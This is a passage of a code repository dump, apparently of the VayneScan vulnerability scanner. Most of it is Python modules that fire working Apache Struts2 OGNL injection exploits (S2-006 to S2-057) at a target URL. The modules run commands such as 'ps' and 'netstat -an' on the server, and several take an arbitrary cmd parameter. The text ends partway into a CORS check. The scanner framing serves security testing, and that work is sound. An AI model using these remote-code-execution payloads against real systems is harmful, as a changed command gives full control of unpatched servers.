https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_016.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_016_2.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_016_2.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_019.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_019.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_032.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_032.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_045.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_045.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_052.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_052.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_053.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_053.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_057.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_057.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_dev.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_dev.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/s2_006.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_006.py
4 | @Time : 2019/08/03 22:28:14
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_006(url):
17 | headers = {"Content-Type": "application/x-www-form-urlencoded"}
18 | exp = '''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ps\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))'''
19 | try:
20 | resp = requests.post(url, data=exp, headers=headers, timeout=10)
21 | if "PID" in resp.text:
22 | print(Vcolors.RED +"存在S2-006漏洞~"+ Vcolors.ENDC)
23 | else:
24 | print(Vcolors.OKGREEN +"不存在S2-006漏洞~"+ Vcolors.ENDC)
25 | except:
26 | print(Vcolors.OKGREEN +"不存在S2-006漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_009.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_009.py
4 | @Time : 2019/08/03 22:01:48
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_009(url):
17 | exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
18 | url += exp
19 | try:
20 | resp = requests.get(url, timeout=10)
21 | if "PID" in resp.text:
22 | print(Vcolors.RED +"存在S2-009漏洞~"+ Vcolors.ENDC)
23 | else:
24 | print(Vcolors.OKGREEN +"不存在S2-009漏洞~"+ Vcolors.ENDC)
25 | except:
26 | print(Vcolors.OKGREEN +"不存在S2-009漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_013.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_013.py
4 | @Time : 2019/08/03 22:01:58
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_013(url):
17 | headers = {"Content-Type": "application/x-www-form-urlencoded"}
18 | exp = '''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23a=@java.lang.Runtime@getRuntime().exec('ps').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}'''
19 | try:
20 | resp = requests.post(url, data=exp, headers=headers, timeout=10)
21 | if "PID" in resp.text:
22 | print(Vcolors.RED +"存在S2-013漏洞~"+ Vcolors.ENDC)
23 | else:
24 | print(Vcolors.OKGREEN +"不存在S2-013漏洞~"+ Vcolors.ENDC)
25 | except:
26 | print(Vcolors.OKGREEN +"不存在S2-013漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_016.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_016.py
4 | @Time : 2019/08/03 22:02:15
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_016(url):
17 | try:
18 | exp = '''?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B'ps'%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D'''
19 | url = url + exp
20 | res = requests.get(url)
21 | if "PID" in res.text:
22 | print(Vcolors.RED +"存在S2-016漏洞~"+ Vcolors.ENDC)
23 | else:
24 | print(Vcolors.OKGREEN +"不存在S2-016漏洞~"+ Vcolors.ENDC)
25 | except:
26 | print(Vcolors.OKGREEN +"不存在S2-016漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_016_2.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_016_2.py
4 | @Time : 2019/08/03 22:02:06
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_016_2(url):
17 | headers = {
18 | "Accept-Encoding": "gzip, deflate",
19 | "Connection": " Keep-Alive",
20 | "Cookie": "",
21 | "Content-Type": "multipart/form-data; boundary=------------------------4a606c052a893987",
22 | }
23 | exp = '''--------------------------4a606c052a893987\r\nContent-Disposition: form-data; name="method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&cmd=ps&pp=\\A&ppp= &encoding=UTF-8"\r\n\r\n-1\r\n--------------------------4a606c052a893987--'''
24 | try:
25 | resp = requests.post(url, data=exp, headers=headers, timeout=10)
26 | if "PID" in resp.text:
27 | print(Vcolors.RED +"存在S2-016漏洞~"+ Vcolors.ENDC)
28 | else:
29 | print(Vcolors.OKGREEN +"不存在S2-016_multipart_formdata__special漏洞~"+ Vcolors.ENDC)
30 | except:
31 | print(Vcolors.OKGREEN +"不存在S2-016_multipart_formdata__special漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_019.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_019.py
4 | @Time : 2019/08/03 22:02:33
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_019(url):
17 | headers = {"Content-Type": "application/x-www-form-urlencoded"}
18 | exp = '''?debug=command&expression=#a=(new java.lang.ProcessBuilder('ps')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#out=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#out.getWriter().println(new java.lang.String(#e)), #d.read(#e),#out.getWriter().println(new java.lang.String(#e)) , #d.read(#e),#out.getWriter().println(new java.lang.String(#e)) ,#out.getWriter().flush(),#out.getWriter().close()'''
19 | url += exp
20 | try:
21 | resp = requests.get(url,headers=headers, timeout=10)
22 | if "PID" in resp.text:
23 | print(Vcolors.RED +"存在S2-019漏洞~"+ Vcolors.ENDC)
24 | else:
25 | print(Vcolors.OKGREEN +"不存在S2-019漏洞~"+ Vcolors.ENDC)
26 | except:
27 | print(Vcolors.OKGREEN +"不存在S2-019漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_032.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_032.py
4 | @Time : 2019/08/03 22:02:50
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_032(url):
17 | headers = {"Content-Type": "application/x-www-form-urlencoded"}
18 | exp = '''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=ps&pp=\\A&ppp=%20&encoding=UTF-8'''
19 | url += exp
20 | try:
21 | resp = requests.get(url,headers=headers, timeout=10)
22 | if "PID" in resp.text:
23 | print(Vcolors.RED +"存在S2-032漏洞~"+ Vcolors.ENDC)
24 | else:
25 | print(Vcolors.OKGREEN +"不存在S2-032漏洞~"+ Vcolors.ENDC)
26 | except:
27 | print(Vcolors.OKGREEN +"不存在S2-032漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_045.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2-045.py
4 | @Time : 2019/08/03 19:15:22
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | import sys
11 | import requests
12 | from lib import *
13 |
14 | def s2_045(url):
15 | try:
16 |
17 | headers = {
18 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
19 | "Content-Type":"%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}.b"
20 | }
21 | r = requests.get(url, headers = headers)
22 | if "struts2_security_check" in r.text:
23 | print(Vcolors.RED +"存在S2-045漏洞~"+ Vcolors.ENDC)
24 | else:
25 | print(Vcolors.OKGREEN +"不存在S2-045漏洞~"+ Vcolors.ENDC)
26 | except:
27 | print(Vcolors.OKGREEN +"不存在S2-045漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_052.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_052.py
4 | @Time : 2019/08/03 22:03:41
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
16 | def s2_052(url):
17 | try:
18 | data = ('')
19 | headers = {'Content-type': 'application/xml'}
20 | res = requests.post(url,headers=headers,data=data)
21 | body = res.text
22 | if "java.util.HashMap" in body:
23 | print(Vcolors.RED +"存在S2-052漏洞~"+ Vcolors.ENDC)
24 | else:
25 | print(Vcolors.OKGREEN +"不存在S2-052漏洞~"+ Vcolors.ENDC)
26 | except:
27 | print(Vcolors.OKGREEN +"不存在S2-052漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_053.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_053.py
4 | @Time : 2019/08/03 22:08:25
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 | from urllib.parse import quote
16 |
17 | def s2_053(url):
18 | try:
19 | cmd = r'ps'
20 | payload = "%{(#_='multipart/form-data')."
21 | payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
22 | payload += "(#_memberAccess?(#_memberAccess=#dm):"
23 | payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
24 | payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
25 | payload += "(#ognlUtil.getExcludedPackageNames().clear())."
26 | payload += "(#ognlUtil.getExcludedClasses().clear())."
27 | payload += "(#context.setMemberAccess(#dm))))."
28 | payload += "(#cmd='%s')." % cmd
29 | payload += "(#iswin=(@java.lang.System@getProperty('os.name')."
30 | payload += "toLowerCase().contains('win')))."
31 | payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
32 | payload += "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))."
33 | payload += "(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream(),'UTF-8'))}"
34 | payload = quote(payload)
35 | resp = requests.get(r'{}/?name={}'.format(url,payload))
36 | if "PID" in resp.text:
37 | print(Vcolors.RED +"存在S2-053漏洞~"+ Vcolors.ENDC)
38 | else:
39 | print(Vcolors.OKGREEN +"不存在S2-053漏洞~"+ Vcolors.ENDC)
40 | except:
41 | print(Vcolors.OKGREEN +"不存在S2-053漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_057.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_057.py
4 | @Time : 2019/08/03 22:03:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from urllib.parse import urlparse
14 | import argparse
15 | import sys
16 | from lib import *
17 |
18 | def s2_057(url):
19 | try:
20 | url1 = urlparse(url)
21 | domainorip = url1.netloc
22 | url = domainorip.split(':')[0]
23 | potorl = url1.scheme # params=url1.params
24 | path = url1.path # query=url1.query
25 | port = url1.port # fragment=url1.fragment
26 | newurl = potorl + '://' + url +':'+ str(port)+'/'
27 | payload = "%24%7B%0A%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ps%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action"
28 | url= newurl+payload+path
29 | res = requests.get(url, allow_redirects=False)
30 | if 'PID' in res.text :
31 | print(Vcolors.RED +"存在S2-057漏洞~"+ Vcolors.ENDC)
32 | else:
33 | print(Vcolors.OKGREEN +"不存在S2-057漏洞~"+ Vcolors.ENDC)
34 | except:
35 | print(Vcolors.OKGREEN +"不存在S2-057漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/app2/s2_dev.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_dev.py
4 | @Time : 2019/08/03 22:10:40
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | from lib import *
15 | import sys
16 |
17 | def s2_dev(url):
18 | headers = {"Content-Type": "application/x-www-form-urlencoded"}
19 | exp = '''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=ps'''
20 | url += exp
21 | try:
22 | resp = requests.get(url, headers=headers, timeout=10)
23 | if "PID" in resp.text:
24 | print(Vcolors.RED +"存在S2-dev漏洞~"+ Vcolors.ENDC)
25 | else:
26 | print(Vcolors.OKGREEN +"不存在S2-dev漏洞~"+ Vcolors.ENDC)
27 | except:
28 | print(Vcolors.OKGREEN +"不存在S2-dev漏洞~"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:45:15
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | #模块引用界面
12 |
13 | from lib.color import Vcolors
--------------------------------------------------------------------------------
/lib/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/lib/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/lib/__pycache__/color.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/lib/__pycache__/color.cpython-37.pyc
--------------------------------------------------------------------------------
/lib/color.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : color.py
4 | @Time : 2019/07/05 14:20:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | class Vcolors:
12 | HEADER = '\033[95m'
13 | OKBLUE = '\033[94m'
14 | OKGREEN = '\033[92m'
15 | WARNING = '\033[93m'
16 | FAIL = '\033[91m'
17 | RED = '\033[31m'
18 | ENDC = '\033[0m'
19 | BOLD = '\033[1m'
20 | UNDERLINE = '\033[4m'
21 | YELLOW= '\033[1;33m'
22 | DARKGRAY= "\033[1;30m"
23 | CYAN= "\033[0;36m"
24 | PURPLE= "\033[0;35m"
25 | BROWN= "\033[0;33m"
26 | WHITE= "\033[1;37m"
27 |
--------------------------------------------------------------------------------
/poc/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:34:57
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | #POC检测脚本模块统一存储
11 |
12 | from poc.svn import svnCheck
13 | from poc.git import gitCheck
14 | from poc.dsstore import dsCheck
15 | from poc.weblogic import weblogicScan
16 | from poc.thinkphprce import thinkphp
17 | from poc.httpOptions import options
18 | from poc.redis import redisCheck
19 | from poc.corscheck import corsCheck
20 | from poc.httpsys import httpsys
21 | from poc.tomcatexample import tomcatCheck
22 | from poc.dirburte import dirburte
23 | from poc.portscan import portScan
24 | from poc.hostinject import hostinject
25 | from poc.esunauto import elasticsearch
26 | from poc.elasticSearch import esCheck
27 | from poc.struts2 import StrutsCheck
28 | from poc.jenkinsunauto import jenkins
29 | from poc.dockerunauto import dockercheck
30 | from poc.solrunautho import apachesolr
31 | from poc.rsyncunauth import rsyncheck
--------------------------------------------------------------------------------
/poc/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/corscheck.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/corscheck.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/dirburte.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/dirburte.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/dockerunauto.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/dockerunauto.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/dsstore.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/dsstore.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/elasticSearch.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/elasticSearch.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/esunauto.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/esunauto.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/git.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/git.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/hostinject.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/hostinject.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/httpOptions.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/httpOptions.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/httpsys.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/httpsys.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/jenkinsunauto.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/jenkinsunauto.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/portscan.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/portscan.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/redis.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/redis.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/rsyncunauth.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/rsyncunauth.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/solrunautho.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/solrunautho.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/struts2.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/struts2.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/svn.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/svn.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/thinkphprce.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/thinkphprce.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/tomcatexample.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/tomcatexample.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/weblogic.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/weblogic.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/corscheck.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : corscheck.py
4 | @Time : 2019/07/06 22:42:55
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | import requests
11 | from lib import *
12 |
13 | def corsCheck(url):
14 | try:
15 | print('\n')
16 | print(Vcolors.OKBLUE + "正在对目标url进行CORS跨域资源共享漏洞探测~~" + Vcolors.ENDC)
17 | orgin = 'www.je2se.com'
18 | headers = {
19 | 'Origin':orgin,
20 | 'Cache-Control':
21 | 'no-cache',
22 | 'User-Agent':
23 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
24 | }
